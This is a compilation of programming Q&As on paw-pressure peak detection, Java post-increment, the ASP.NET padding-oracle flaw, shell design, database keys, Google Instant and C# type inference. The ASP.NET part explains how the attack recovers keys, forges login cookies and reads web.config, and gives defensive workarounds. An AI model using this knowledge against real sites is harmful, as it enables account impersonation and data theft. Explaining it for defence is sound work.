## Peak detection in a 2D array

I'm helping a veterinary clinic measure the pressure under a dog's paw. I use Python for my data analysis, and now I'm stuck trying to divide the paws into (anatomical) subregions.

I made a 2D array of each paw, consisting of the maximal values each sensor measured while being loaded by the paw over time. Here's an example of one paw, where I used Excel to draw the areas I want to 'detect'. These are 2-by-2 boxes around the sensors with local maxima that together have the largest sum.

So I tried some experimenting and decided to simply look for the maxima of each column and row (I can't look in one direction only, due to the shape of the paw). This seems to 'detect' the location of the separate toes fairly well, but it also marks neighboring sensors.
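In code, the row-and-column-maximum idea looks roughly like this (a sketch of what I mean, not necessarily the exact code; `paw` is the 2D pressure array):

```python
import numpy as np

def row_col_maxima(paw):
    """Mark every sensor that is the maximum of its row or its column.

    This is the naive approach described above: it finds the toes,
    but it also marks neighboring sensors that top a row or column
    without being a true local peak.
    """
    row_max = paw == paw.max(axis=1, keepdims=True)
    col_max = paw == paw.max(axis=0, keepdims=True)
    return row_max | col_max
```

On a toy 3x3 paw with a single peak of 9 in the middle, this marks five cells: the peak plus its four row/column neighbors, which is exactly the over-marking problem.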

So what would be the best way to tell Python which of these maxima are the ones I want?

Note: The 2x2 squares can't overlap, since they have to be separate toes!

Also, I took 2x2 as a convenience; any more advanced solution is welcome, but I'm simply a human movement scientist, so I'm neither a real programmer nor a mathematician. Please keep it 'simple'.

Edit: Here's a link to my array with the four average paws. I used pickle to write it to the file as was suggested here

## Results

So I tried @jextee's solution (see the results below). As you can see, it works very well on the front paws, but less well on the hind legs.

More specifically, it can't recognize the small peak that's the fourth toe. This is obviously inherent to the fact that the loop looks top-down towards the lowest value, without taking into account where it is.

Would anyone know how to tweak @jextee's algorithm, so that it might be able to find the 4th toe too?

Since I haven't processed any other trials yet, I can't supply any other samples. But the data I gave before were the averages of each paw. This file is an array with the maximal data of 9 paws in the order they made contact with the plate.

This image shows how they were spatially spread out over the plate.

## Update:

I have set up a blog for anyone interested, and I have set up a SkyDrive with all the raw measurements. So to anyone requesting more data: more power to you!

## New update:

So after the help I got with my questions regarding paw detection and paw sorting, I was finally able to check the toe detection for every paw! Turns out, it doesn't work well on anything but paws the size of the one in my own example. Of course, in hindsight, it's my own fault for choosing the 2x2 so arbitrarily.

Here's a nice example of where it goes wrong: a nail is being recognized as a toe and the 'heel' is so wide, it gets recognized twice!

The paw is too large, so taking a 2x2 size with no overlap causes some toes to be detected twice. The other way around: in small dogs it often fails to find a 5th toe, which I suspect is caused by the 2x2 area being too large.

After trying the current solution on all my measurements I came to the staggering conclusion that for nearly all my small dogs it didn't find a 5th toe and that in over 50% of the impacts for the large dogs it would find more!

So clearly I need to change it. My own guess was changing the size of the `neighborhood` to something smaller for small dogs and larger for large dogs. But `generate_binary_structure` wouldn't let me change the size of the array.

Therefore, I'm hoping that anyone else has a better suggestion for locating the toes, perhaps having the toe area scale with the paw size?

I detected the peaks using a local maximum filter. Here is the result on your first dataset of 4 paws:

I also ran it on the second dataset of 9 paws and it worked as well.

Here is how you do it:

``````import numpy as np
from scipy.ndimage import maximum_filter, generate_binary_structure, binary_erosion
import matplotlib.pyplot as pp

# for some reason I had to reshape. Numpy ignored the shape header.
# (paws_data is the array loaded from the pickled file)

# getting a list of images
paws = [p.squeeze() for p in np.vsplit(paws_data, 4)]

def detect_peaks(image):
    """
    Takes an image and detects the peaks using the local maximum filter.
    Returns a boolean mask of the peaks (i.e. 1 when
    the pixel's value is the neighborhood maximum, 0 otherwise).
    """

    # define an 8-connected neighborhood
    neighborhood = generate_binary_structure(2, 2)

    # apply the local maximum filter; all pixels of maximal value
    # in their neighborhood are set to 1
    local_max = maximum_filter(image, footprint=neighborhood) == image
    # local_max is a mask that contains the peaks we are
    # looking for, but also the background.
    # In order to isolate the peaks we must remove the background from the mask.

    # we create the mask of the background
    background = (image == 0)

    # a little technicality: we must erode the background in order to
    # successfully subtract it from local_max, otherwise a line will
    # appear along the background border (an artifact of the local maximum filter)
    eroded_background = binary_erosion(background, structure=neighborhood, border_value=1)

    # we obtain the final mask, containing only peaks,
    # by removing the background from the local_max mask
    # (XOR, since subtracting boolean masks is not supported in NumPy)
    detected_peaks = local_max ^ eroded_background

    return detected_peaks

# applying the detection and plotting the results
for i, paw in enumerate(paws):
    detected_peaks = detect_peaks(paw)
    pp.subplot(4, 2, 2 * i + 1)
    pp.imshow(paw)
    pp.subplot(4, 2, 2 * i + 2)
    pp.imshow(detected_peaks)

pp.show()
``````

All you need to do afterwards is use `scipy.ndimage.label` on the mask to label all distinct objects. Then you'll be able to play with them individually.
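As a quick illustration of that labeling step (the mask below is a made-up stand-in for the output of `detect_peaks`):

```python
import numpy as np
from scipy import ndimage

# stand-in for the boolean mask returned by detect_peaks(paw)
mask = np.array([[0, 1, 0, 0],
                 [0, 0, 0, 1],
                 [0, 0, 0, 0]], dtype=bool)

# label each connected blob of peaks with its own integer
labeled, num_peaks = ndimage.label(mask)

# e.g. the coordinates of each peak, one tuple per label
centers = ndimage.center_of_mass(mask, labeled, range(1, num_peaks + 1))
```

`num_peaks` is the number of distinct toes, and each label in `labeled` can then be handled individually.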

Note that the method works well because the background is not noisy. If it were, you would detect a bunch of other, unwanted peaks in the background. Another important factor is the size of the neighborhood: you will need to adjust it if the peak size changes (the two should remain roughly proportional).
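One way to let the neighborhood scale with the paw, as the question's last update asks for, is to skip `generate_binary_structure` (which is fixed at 3x3) and pass `maximum_filter` a `size` derived from the paw's bounding box. A rough sketch, where the `fraction` value is a guess you would have to tune against real measurements:

```python
import numpy as np
from scipy.ndimage import maximum_filter

def scaled_peak_mask(paw, fraction=0.25):
    """Local-maximum mask with a footprint proportional to paw size."""
    rows, cols = np.nonzero(paw > 0)
    if rows.size == 0:
        return np.zeros(paw.shape, dtype=bool)
    height = rows.max() - rows.min() + 1
    width = cols.max() - cols.min() + 1
    # square neighborhood, a fraction of the smaller paw dimension
    side = max(3, int(round(fraction * min(height, width))))
    local_max = maximum_filter(paw, size=side) == paw
    return local_max & (paw > 0)   # drop the flat zero background
```

Small paws then get a small neighborhood (so the 5th toe survives) and large paws a big one (so toes aren't detected twice).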

## Why does this go into an infinite loop?

I'm a teacher, and yesterday a student wrote the following code:

``````public class Tests {

    public static void main(String[] args) throws Exception {
        int x = 0;
        while (x < 3) {
            x = x++;
            System.out.println(x);
        }
    }
}
``````

We know he should have written just `x++` or `x = x + 1`, but `x = x++;` should first assign x to itself, and then increment x. Why does x stay at 0?

--update

Here's the bytecode:

``````public class Tests extends java.lang.Object{
public Tests();
  Code:
   0:   aload_0
   1:   invokespecial   #1; //Method java/lang/Object."<init>":()V
   4:   return

public static void main(java.lang.String[])   throws java.lang.Exception;
  Code:
   0:   iconst_0
   1:   istore_1
   2:   iload_1
   3:   iconst_3
   4:   if_icmpge   22
   7:   iload_1
   8:   iinc    1, 1
   11:  istore_1
   12:  getstatic   #2; //Field java/lang/System.out:Ljava/io/PrintStream;
   15:  iload_1
   16:  invokevirtual   #3; //Method java/io/PrintStream.println:(I)V
   19:  goto    2
   22:  return

}
``````

Perhaps if we write out a method to do the equivalent of what `x++` does it will make this clearer.

(Note: this is C# code for the purpose of illustration. Unless I'm mistaken there's actually no way to pass a parameter by reference in Java.)

``````public static int PostIncrement(ref int x)
{
    int valueBeforeIncrement = x;
    x = valueBeforeIncrement + 1;
    return valueBeforeIncrement;
}
``````

Right? Increment the value passed and return the original value: that's the definition of the postincrement operator.

Now, let's see how this behavior plays out in your example code:

``````int x = 0;
x = PostIncrement(ref x);
``````

`PostIncrement(ref x)` does what? Increments `x`, yes. And then returns what `x` was before the increment. This return value then gets assigned to `x`.

So the order of values assigned to `x` is 0, then 1, then 0.

This might be clearer still if we re-write the above:

``````int x = 0;                       // x is 0.
int temp = PostIncrement(ref x); // Now x is 1, and temp is 0.
x = temp;                        // Now x is 0 again.
``````

Your fixation on the fact that when you replace `x` on the left side of the above assignment with `y`, "you can see that it first increments x, and later attributes it to y" strikes me as confused. It is not `x` that is being assigned to `y`; it is the value formerly assigned to `x`. Really, injecting `y` makes things no different from the scenario above; we've simply got:

``````int x = 0;                       // x is 0.
int y = 0;                       // y is 0.
int temp = PostIncrement(ref x); // Now x is 1, and temp is 0.
y = temp;                        // y is still 0.
``````

So it's clear: `x = x++` effectively does not change the value of x. It always causes x to have the values x0, then x0 + 1, and then x0 again.
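For readers more comfortable with Python (which has no `++`), the same two-step semantics can be modeled explicitly; this is an illustrative model, not Java:

```python
def post_increment(env, name):
    """Model of Java's name++: increment the variable, return the OLD value."""
    old = env[name]
    env[name] = old + 1   # the variable briefly holds the new value here...
    return old            # ...but the old value is what gets returned

env = {"x": 0}
env["x"] = post_increment(env, "x")   # the Java `x = x++;`
# env["x"] is 0 again: the returned old value overwrote the increment
```

The temporary value 1 exists inside `post_increment`, but the assignment on the outside immediately puts 0 back.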

Update: Incidentally, lest you doubt that `x` ever gets set to 1 "between" the increment operation and the assignment in the example above, I've thrown together a quick demo to illustrate that this intermediate value does indeed "exist," though it will never be "seen" on the executing thread.

The demo calls `x = x++;` in a loop while a separate thread continuously prints the value of `x` to the console.

The code is in Java, but I warn you: I have basically zero experience in Java (I only even answered this question because I felt I could explain what was happening with the `++` operator). So this code might be hideous to a seasoned Java developer.

``````public class Main {
    public static volatile int x = 0;

    public static void main(String[] args) {
        Thread t = new Thread() {
            @Override
            public void run() {
                System.out.println("Starting background thread...");
                while (true) {
                    System.out.println(Main.x);
                }
            }
        };
        t.start();

        while (true) {
            x = x++;
        }
    }
}
``````
``````

Below is an excerpt of the above program's output. Notice the occasional occurrence of 1 amongst a flurry of 0s.

```Starting background thread...
0
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
1
```

## How serious is this new ASP.NET security vulnerability and how can I workaround it?

I've just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here.

The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions.

This is a bit vague, but here is a more frightening part:

The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy. The cryptographic knowledge required is very basic.

All in all, I'm not familiar enough with the security/cryptography subject to know whether this is really that serious.

So, should all ASP.NET developers fear this technique that can own any ASP.NET website in seconds or what?

How does this issue affect the average ASP.NET developer? Does it affect us at all? In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?

## EDIT: I'd like to summarize the responses I got so far.

So, this is basically a "padding oracle" type of attack. @Sri provided a great explanation of what this type of attack means. Here is a shocking video about the issue!

About the seriousness of this vulnerability: yes, it is indeed serious. It lets the attacker learn the machine key of an application. Thus, he can do some very unwanted things.

• In possession of the app's machine key, the attacker can decrypt authentication cookies.
• Even worse, he can generate authentication cookies with the name of any user, and thus appear as anyone on the site. The application is unable to differentiate between you and a hacker who generated an authentication cookie with your name for himself.
• It also lets him decrypt (and also generate) session cookies, although this is not as dangerous as the previous one.
• Not so serious: he can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidential data, you shouldn't be doing that anyway!)
• Quite unexpected: with the knowledge of the machine key, the attacker can download any arbitrary file from your web application, even those that normally can't be downloaded! (Including Web.config, etc.)

Here is a bunch of good practices I got. They don't solve the issue, but they help improve the general security of a web application.

Now, let's focus on this issue.

The solution

• Enable customErrors and create a single error page to which all errors are redirected. Yes, even 404s. (ScottGu said that differentiating between 404s and 500s is essential for this attack.) Also, in your `Application_Error` or `Error.aspx`, put some code that introduces a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server.
• Some people recommended switching back to 3DES. In theory, if you don't use AES, you don't encounter the security weakness in the AES implementation. As it turns out, this is not recommended at all.

Some other thoughts

• Seems that not everyone thinks the workaround is good enough.

Thanks to everyone who cared to answer my question. I learned a lot, not only about this issue, but about web security in general. I marked @Mikael's answer as accepted, but the other answers are also very useful.

### What should I do to protect myself?

[Update 2010-09-29]

Microsoft security bulletin

KB Article with reference to the fix

[Update 2010-09-25]

While we are waiting for the fix, yesterday ScottGu posted an update on how to add an extra step to protect your sites with a custom URLScan rule.

Basically, make sure you provide a custom error page so that an attacker is not exposed to internal .NET errors, which you should always do in release/production mode anyway.

Additionally, add a random sleep in the error page to prevent the attacker from timing the responses for additional attack information.

In web.config

``````<configuration>
  <location allowOverride="false">
    <system.web>
      <customErrors mode="On" defaultRedirect="~/error.html" />
    </system.web>
  </location>
</configuration>
``````

This will redirect any error to a custom page returned with a 200 status code. This way an attacker cannot use error codes or error information to gather what's needed for further attacks.

It is also safe to set `customErrors mode="RemoteOnly"`, as this will redirect "real" clients. Only browsing from localhost will show internal .Net errors.

The important part is to make sure that all errors are configured to return the same error page. This requires you to explicitly set the `defaultRedirect` attribute on the `<customErrors>` section and ensure that no per-status error pages are set.

### What's at stake?

If an attacker manages to use the mentioned exploit, he/she can download internal files from within your web application. Typically web.config is a target, and it may contain sensitive information like the login information in a database connection string, or even a link to an automounted SQL Express database which you don't want anyone to get hold of. But if you are following best practice, you use Protected Configuration to encrypt all sensitive data in your web.config.

Read Microsoft's official comment about the vulnerability at http://www.microsoft.com/technet/security/advisory/2416728.mspx; see specifically the "Workaround" part for implementation details on this issue.

Also some information on ScottGu's blog, including a script to find vulnerable ASP.Net apps on your web server.

The attack that Rizzo and Duong have implemented against ASP.NET apps requires that the crypto implementation on the Web site have an oracle that, when sent ciphertext, will not only decrypt the text but also give the sender a message about whether the padding in the ciphertext is valid.

If the padding is invalid, the error message that the sender gets will give him some information about the way that the site's decryption process works.
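To make "padding oracle" concrete: CBC-mode ciphertexts end with PKCS#7 padding, and the oracle is any observable difference between "padding invalid" and any other failure. A toy unpadding routine (illustrative only, not ASP.NET's actual code):

```python
def pkcs7_unpad(data: bytes, block_size: int = 16) -> bytes:
    """Toy PKCS#7 unpadding. The distinct 'bad padding' error is
    exactly the signal a padding-oracle attacker listens for."""
    if not data or len(data) % block_size:
        raise ValueError("bad length")
    pad = data[-1]
    if pad < 1 or pad > block_size or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")  # observable oracle response
    return data[:-pad]
```

An attacker who can submit tampered ciphertexts and tell these two errors apart can recover plaintext byte by byte, which is why the workaround insists on one uniform error response for everything.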

In order for the attack to work, the application has to reveal which kind of error occurred. So, if you return generic, human-readable error messages in your app, like "Something went wrong, please try again", then you should be pretty safe. Reading the comments on the article also gives valuable information.

• Store a session id in the crypted cookie
• Store the real data in session state (persisted in a db)
• Add a random wait before returning the error when user information is wrong, so the attacker can't time it

That way a hijacked cookie can only be used to retrieve a session, which most likely is no longer present or has been invalidated.
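The first two bullet points above (an opaque id in the cookie, real data server-side) can be sketched like this; the names are illustrative, not any particular framework's API:

```python
import secrets

# server-side session store (in production: a database table)
sessions = {}

def create_session(user_id):
    """Put only a random, meaningless id in the cookie; keep the
    real data server-side so a decrypted cookie reveals nothing."""
    session_id = secrets.token_urlsafe(32)
    sessions[session_id] = {"user_id": user_id}
    return session_id  # value to send in the cookie

def resolve_session(session_id):
    # a hijacked or forged cookie only works while this entry exists
    return sessions.get(session_id)

def invalidate_session(session_id):
    # killing the server-side entry also kills any stolen cookie
    sessions.pop(session_id, None)
```

Even if an attacker decrypts or forges the cookie, all he gets is a random token that the server can revoke at any time.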

It will be interesting to see what is actually presented at the Ekoparty conference, but right now I'm not too worried about this vulnerability.

## Why are scripting languages (e.g. Perl, Python, Ruby) not suitable as shell languages?

What are the differences between shell languages like bash, zsh, fish and the scripting languages above that makes them more suitable for the shell?

When using the command line, the shell languages seem to be much easier. It feels much smoother for me to use bash, for example, than the shell profile in ipython, despite reports to the contrary. I think most will agree with me that a large portion of medium- to large-scale programming is easier in Python than in bash. I use Python as the language I am most familiar with; the same goes for Perl and Ruby.

I have tried to articulate the reason, but I am unable to, aside from assuming that the different treatment of strings in the two has something to do with it.

The reason for this question is that I am hoping to develop a language usable in both. If you know of such a language, please post it as well.

Edit: As S.Lott explains, the question needs some clarification. I am asking about the features of the shell language versus that of scripting languages. So the comparison is not about the characteristics of various interactive (REPL) environments such as history and command line substitution. An alternative expression for the question would be:

Can a programming language that is suitable for design of complex systems be at the same time able to express useful one-liners that can access the file system or control jobs? Can a programming language usefully scale up as well as scale down?

There are a couple of differences that I can think of. (Just thoughtstreaming here; there's no particular order to these.)

1. Python & Co. are designed to be good at scripting. Bash & Co. are designed to be only good at scripting, with absolutely no compromise. IOW: Python is designed to be good both at scripting and non-scripting, Bash cares only about scripting.
2. Bash & Co. are untyped, Python & Co. are strongly typed, which means that the number `123`, the string `123` and the file `123` are quite different. They are, however, not statically typed, which means they need to have different literals for those, in order to keep them apart. Example:

• Ruby: `123` (number), Bash: `123`
• Ruby: `'123'` (string), Bash: `123`
• Ruby: `/123/` (regexp), Bash: `123`
• Ruby: `File.open('123')` (file), Bash: `123`
• Ruby: `IO.open('123')` (file descriptor), Bash: `123`
• Ruby: `URI.parse('123')` (URI), Bash: `123`
• Ruby: ``123`` (command), Bash: `123`
3. Python & Co. are designed to scale up to 10000, 100000, maybe even 1000000 line programs, Bash & Co. are designed to scale down to 10 character programs.

4. In Bash & Co., files, directories, file descriptors and processes are all first-class objects. In Python, only Python objects are first-class; if you want to manipulate files, directories etc., you have to wrap them in a Python object first.
5. Shell programming is basically dataflow programming. Nobody realizes that, not even the people who write shells, but it turns out that shells are quite good at that, and general-purpose languages not so much. In the general-purpose programming world, dataflow seems to be mostly viewed as a concurrency model, not so much as a programming paradigm.

I have the feeling that trying to address these points by bolting features or DSLs onto a general-purpose programming language doesn't work. At least, I have yet to see a convincing implementation of it. There is RuSH (Ruby shell), which tries to implement a shell in Ruby, there is rush, which is an internal DSL for shell programming in Ruby, there is Hotwire, which is a Python shell, but IMO none of those come even close to competing with Bash, Zsh, fish and friends.

Actually, IMHO, the best current shell is Microsoft PowerShell, which is very surprising considering that for several decades now, Microsoft has continually had the worst shells evar. I mean, `COMMAND.COM`? Really? (Unfortunately, they still have a crappy terminal. It's still the "command prompt" that has been around since, what? Windows 3.0?)

PowerShell was basically created by ignoring everything Microsoft has ever done (`COMMAND.COM`, `CMD.EXE`, VBScript, JScript) and instead starting from the Unix shell, then removing all backwards-compatibility cruft (like backticks for command substitution) and massaging it a bit to make it more Windows-friendly (like using the now-unused backtick as an escape character instead of the backslash, which is the path component separator in Windows). After that is when the magic happens.

They address problems 1 and 3 from above by basically making the opposite choice compared to Python. Python cares about large programs first, scripting second. Bash cares only about scripting. PowerShell cares about scripting first, large programs second. A defining moment for me was watching a video of an interview with Jeffrey Snover (PowerShell's lead designer), when the interviewer asked him how big of a program one could write with PowerShell and Snover answered without missing a beat: "80 characters." At that moment I realized that this is finally a guy at Microsoft who "gets" shell programming (probably related to the fact that PowerShell was neither developed by Microsoft's programming language group (i.e. lambda-calculus math nerds) nor the OS group (kernel nerds) but rather the server group (i.e. sysadmins who actually use shells)), and that I should probably take a serious look at PowerShell.

Number 2 is solved by having arguments be statically typed. So, you can write just `123` and PowerShell knows whether it is a string or a number or a file, because the cmdlet (which is what shell commands are called in PowerShell) declares the types of its arguments to the shell. This has pretty deep ramifications: unlike Unix, where each command is responsible for parsing its own arguments (the shell basically passes the arguments as an array of strings), argument parsing in PowerShell is done by the shell. The cmdlets specify all their options and flags and arguments, as well as their types and names and documentation(!) to the shell, which then can perform argument parsing, tab completion, IntelliSense, inline documentation popups etc. in one centralized place. (This is not revolutionary, and the PowerShell designers acknowledge shells like the DIGITAL Command Language (DCL) and the IBM OS/400 Command Language (CL) as prior art. For anyone who has ever used an AS/400, this should sound familiar. In OS/400, you can write a shell command and if you don't know the syntax of certain arguments, you can simply leave them out and hit F4, which will bring up a menu (similar to an HTML form) with labelled fields, dropdowns, help texts etc. This is only possible because the OS knows about all the possible arguments and their types.) In the Unix shell, this information is often duplicated three times: in the argument parsing code in the command itself, in the `bash-completion` script for tab-completion and in the manpage.
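The centralized-parsing idea can be approximated in Python with `argparse`: the command declares its argument names, types and help text once, and the library (standing in for the shell) does the parsing, type conversion and documentation in one place. The cmdlet name and parameters below are made up for illustration:

```python
import argparse

# declare the interface once: names, types, help text
parser = argparse.ArgumentParser(prog="Get-ChildItem",
                                 description="List items in a location")
parser.add_argument("path", type=str, help="where to look")
parser.add_argument("--depth", type=int, default=1, help="recursion depth")

# the "shell" (argparse) performs the parsing and type conversion;
# the command body only ever sees typed values
args = parser.parse_args(["some/dir", "--depth", "3"])
```

Because the declaration lives in one place, `--help` output, error messages and type checking all come for free, instead of being duplicated in the command, the completion script and the manpage.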

Number 4 is solved by the fact that PowerShell operates on strongly typed objects, which includes stuff like files, processes, folders and so on.

Number 5 is particularly interesting, because PowerShell is the only shell I know of, where the people who wrote it were actually aware of the fact that shells are essentially dataflow engines and deliberately implemented it as a dataflow engine.

Another nice thing about PowerShell is its naming conventions: all cmdlets are named `Action-Object` and moreover, there are also standardized names for specific actions and specific objects. (Again, this should sound familiar to OS/400 users.) For example, everything which is related to receiving some information is called `Get-Foo`. And everything operating on (sub-)objects is called `Bar-ChildItem`. So, the equivalent to `ls` is `Get-ChildItem` (although PowerShell also provides builtin aliases `ls` and `dir` – in fact, whenever it makes sense, they provide both Unix and `CMD.EXE` aliases as well as abbreviations (`gci` in this case)).

But the killer feature IMO is the strongly typed object pipelines. While PowerShell is derived from the Unix shell, there is one very important distinction: in Unix, all communication (both via pipes and redirections as well as via command arguments) is done with untyped, unstructured, ASCII strings. In PowerShell, it's all strongly typed, structured objects. This is so incredibly powerful that I seriously wonder why no one else has thought of it. (Well, they have, but they never became popular.) In my shell scripts, I estimate that up to one third of the commands are only there to act as adapters between two other commands that don't agree on a common textual format. Many of those adapters go away in PowerShell, because the cmdlets exchange structured objects instead of unstructured text. And if you look inside the commands, then they pretty much consist of three stages: parse the textual input into an internal object representation, manipulate the objects, convert them back into text. Again, the first and third stage basically go away, because the data already comes in as objects.
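The text-pipe vs. object-pipe difference can be sketched in Python; the "adapter" stage in the first pipeline is exactly the kind of parsing step that disappears when structured records flow through instead:

```python
# Text pipeline (Unix style): every stage has to re-parse strings.
lines = ["alice 42", "bob 7", "carol 99"]
parsed = (line.split() for line in lines)           # adapter: text -> fields
big = (f"{name} {score}" for name, score in parsed  # filter, then back to text
       if int(score) > 10)

# Object pipeline (PowerShell style): structured records flow through,
# with no parse/serialize stages in between.
records = [{"name": "alice", "score": 42},
           {"name": "bob", "score": 7},
           {"name": "carol", "score": 99}]
big_records = [r for r in records if r["score"] > 10]
```

Both produce the same result, but the object version never has to agree on, or re-parse, a textual format between stages.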

However, the designers have taken great care to preserve the dynamicity and flexibility of shell scripting through what they call an Adaptive Type System.

Anyway, I don't want to turn this into a PowerShell commercial. There are plenty of things that are not so great about PowerShell, although most of those have to do either with Windows or with the specific implementation, and not so much with the concepts. (E.g. the fact that it is implemented in .NET means that the very first time you start up the shell can take up to several seconds if the .NET framework is not already in the filesystem cache due to some other application that needs it. Considering that you often use the shell for well under a second, that is completely unacceptable.)

The most important point I want to make is that if you want to look at existing work in scripting languages and shells, you shouldn't stop at Unix and the Ruby/Python/Perl/PHP family. For example, Tcl was already mentioned. Rexx would be another scripting language. Emacs Lisp would be yet another. And in the shell realm there are some of the already mentioned mainframe/midrange shells such as the OS/400 command line and DCL. Also, Plan9's rc.

## Is an email address a bad candidate for a primary key?

Is an email address a bad candidate for a primary key, compared to auto-incrementing numbers? Our web application needs email addresses to be unique in the system, so I thought of using the email address as the primary key. But my colleague suggests that string comparison will be slower than integer comparison. Is that a valid reason not to use email addresses as primary keys?

We are using Postgres. Thanks!

String comparison is slower than int comparison. However, this does not matter if you simply retrieve a user from the database using the e-mail address. It does matter if you have complex queries with multiple joins.

If you store information about users in multiple tables, the foreign keys to the users table will be the e-mail address. That means that you store the e-mail address multiple times.

## How does Google Instant work?

Any ideas on exactly how the new google instant search works? It seems to just be AJAX calls to the old search, but it's pretty hard to simplify Google that much. Anybody have speculations?

EDIT: I know there is an AJAX request sent on each keypress, but is it predictive? Or do you think it's just a regular ol' Google search?

UPDATE: Google have just published a blog article called Google Instant, behind the scenes. It's an interesting read, and obviously related to this question. You can read how they tackled the extra load (5-7X according to the article) on the server-side, for example. The answer below examines what happens on the client-side:

Examining with Firebug, Google is doing an Ajax GET request on every keypress:

I guess it's working the same way as the autocompletion. However, this time it also returns the search results of the partially completed search phrase in JSON format.

Examining one of the JSON responses while typing "Stack Overflow":

We can see that the JSON response contains the content to construct the search results as we type.

The formatted JSON responses look something like this:

``````{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
}/*""*/{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
}/*""*/{
e: "j9iHTLXlLNmXOJLQ3cMO",
c: 1,
d: "\x3cscript\x3eje.p(_loc,\x27botstuff\x27,\x27 \\x3cdiv id\\x3dbrs style\\x3d\\x22clear:both;margin-bottom:17px;overflow:hidden\\x22\\x3e\\x3cdiv class\\x3d\\x22med\\x22 style\\x3d\\x22text-align:left\\x22\\x3eSearches related to \\x3cem\\x3eStack Overflow\\x3c/em\\x3e\\x3c/div\\x3e\\x3cdiv class\\x3dbrs_col\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+error\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEkQ1QIoAA\\x22\\x3estack overflow \\x3cb\\x3eerror\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+internet+explorer\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEoQ1QIoAQ\\x22\\x3estack overflow \\x3cb\\x3einternet explorer\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dfix+stack+overflow\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEsQ1QIoAg\\x22\\x3e\\x3cb\\x3efix\\x3c/b\\x3e stack overflow\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+xp\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEwQ1QIoAw\\x22\\x3estack overflow \\x3cb\\x3exp\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3c/div\\x3e\\x3cdiv class\\x3dbrs_col\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+javascript\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE0Q1QIoBA\\x22\\x3estack overflow \\x3cb\\x3ejavascript\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca 
href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+java\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE4Q1QIoBQ\\x22\\x3estack overflow \\x3cb\\x3ejava\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+c%2B%2B\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CE8Q1QIoBg\\x22\\x3estack overflow \\x3cb\\x3ec++\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3cp\\x3e\\x3ca href\\x3d\\x22/search?hl\\x3den\\x26amp;q\\x3dstack+overflow+windows+xp\\x26amp;revid\\x3d-1\\x26amp;sa\\x3dX\\x26amp;ei\\x3dj9iHTLXlLNmXOJLQ3cMO\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CFAQ1QIoBw\\x22\\x3estack overflow \\x3cb\\x3ewindows xp\\x3c/b\\x3e\\x3c/a\\x3e\\x3c/p\\x3e\\x3c/div\\x3e\\x3c/div\\x3e \x27,_ss);/*  */\x3c/script\x3e"
}/*""*/
``````

## Problem understanding C# type inference as described in the language specification

The C# language specification describes type inference in Section §7.5.2. There is a detail in it that I don’t understand. Consider the following case:

``````// declaration
void Method<T>(T obj, Func<string, T> func);

// call
Method("obj", s => (object) s);
``````

Both the Microsoft and Mono C# compilers correctly infer `T` = `object`, but my understanding of the algorithm in the specification would yield `T` = `string` and then fail. Here is how I understand it:

The first phase

• If Ei is an anonymous function, an explicit parameter type inference (§7.5.2.7) is made from Ei to Ti

⇒ has no effect, because the lambda expression has no explicit parameter types. Right?

• Otherwise, if Ei has a type U and xi is a value parameter then a lower-bound inference is made from U to Ti.

⇒ the first parameter is of static type `string`, so this adds `string` to the lower bounds for `T`, right?

The second phase

• All unfixed type variables Xi which do not depend on (§7.5.2.5) any Xj are fixed (§7.5.2.10).

`T` is unfixed; `T` doesn’t depend on anything... so `T` should be fixed, right?

